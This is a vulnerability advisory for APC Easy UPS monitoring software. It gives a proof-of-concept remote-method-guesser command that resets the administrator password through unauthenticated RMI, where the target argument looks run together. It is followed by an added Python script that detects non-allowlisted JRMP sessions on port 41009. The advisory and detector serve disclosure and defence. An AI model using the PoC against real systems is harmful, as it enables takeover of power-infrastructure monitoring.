A vulnerability in Schneider Electric APC Easy UPS Online Monitoring Software V2.5-GS-01-22320 allows an unauthenticated remote attacker to issue RMI calls to certain remote Java objects in the application.
For example, the attacker can invoke cn.com.voltronicpower.rmiclass.SystemService.updateManagerPassword() to change the administrator password for the monitoring software.
POC:
- Install remote-method-guesser
- Run: java -jar rmg-4.3.1-jar-with-dependencies.jar call41009 '"482c811da5d5b4bc6d497ffa98491e38"' --signature 'String updateManagerPassword(String managerPassword)' --bound-name system
- This command attempts to change the application's Administrator password to "password123" (without quotes)
- To reset to a different password, replace 482c811da5d5b4bc6d497ffa98491e38 with the MD5 hash hex string of a given password
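
Detection logic for the exposure described above, as an added example that is not part of the original advisory or the vendor's software: it flags JRMP (Java RMI wire protocol) sessions that reach the RMI port from sources outside an allowlist. It assumes the 41009 in the PoC command is the RMI port; the flow-record fields, the allowlist and the sample flows are constructed for illustration.

```python
import ipaddress
import struct

JRMP_MAGIC = b"JRMI"  # 0x4a524d49, first bytes a client sends on a JRMP stream
JRMP_PROTOCOLS = {0x4B: "Stream", 0x4C: "SingleOp", 0x4D: "Multiplex"}
RMI_PORT = 41009  # assumption: the port number seen in the PoC command
# Assumption: only local clients have a reason to speak RMI to the service.
ALLOWED_SOURCES = [ipaddress.ip_network("127.0.0.0/8")]


def parse_jrmp_header(payload: bytes):
    """Return (version, protocol_name) if payload opens a JRMP stream, else None."""
    if len(payload) < 7 or payload[:4] != JRMP_MAGIC:
        return None
    version, proto = struct.unpack(">HB", payload[4:7])
    name = JRMP_PROTOCOLS.get(proto)
    return (version, name) if name else None


def is_allowed(src: str) -> bool:
    addr = ipaddress.ip_address(src)
    return any(addr in net for net in ALLOWED_SOURCES)


def find_suspect_rmi_sessions(flows):
    """flows: dicts with src, dst_port and first_bytes (hex of client's first payload)."""
    alerts = []
    for flow in flows:
        if flow["dst_port"] != RMI_PORT:
            continue
        header = parse_jrmp_header(bytes.fromhex(flow["first_bytes"]))
        if header and not is_allowed(flow["src"]):
            alerts.append((flow["src"], header[0], header[1]))
    return alerts


# Constructed sample flows (documentation address ranges, not real captures).
SAMPLE_FLOWS = [
    {"src": "127.0.0.1", "dst_port": 41009, "first_bytes": "4a524d4900024b"},
    {"src": "203.0.113.7", "dst_port": 41009, "first_bytes": "4a524d4900024b"},
    {"src": "203.0.113.7", "dst_port": 41009, "first_bytes": "474554202f20"},  # "GET / "
    {"src": "198.51.100.9", "dst_port": 443, "first_bytes": "4a524d4900024b"},
]

if __name__ == "__main__":
    for src, version, proto in find_suspect_rmi_sessions(SAMPLE_FLOWS):
        print(f"ALERT: JRMP v{version} {proto} session to port {RMI_PORT} from {src}")
```

Because the RMI calls require no authentication, any non-allowlisted JRMP session to this port is worth investigating, whichever remote method it goes on to invoke.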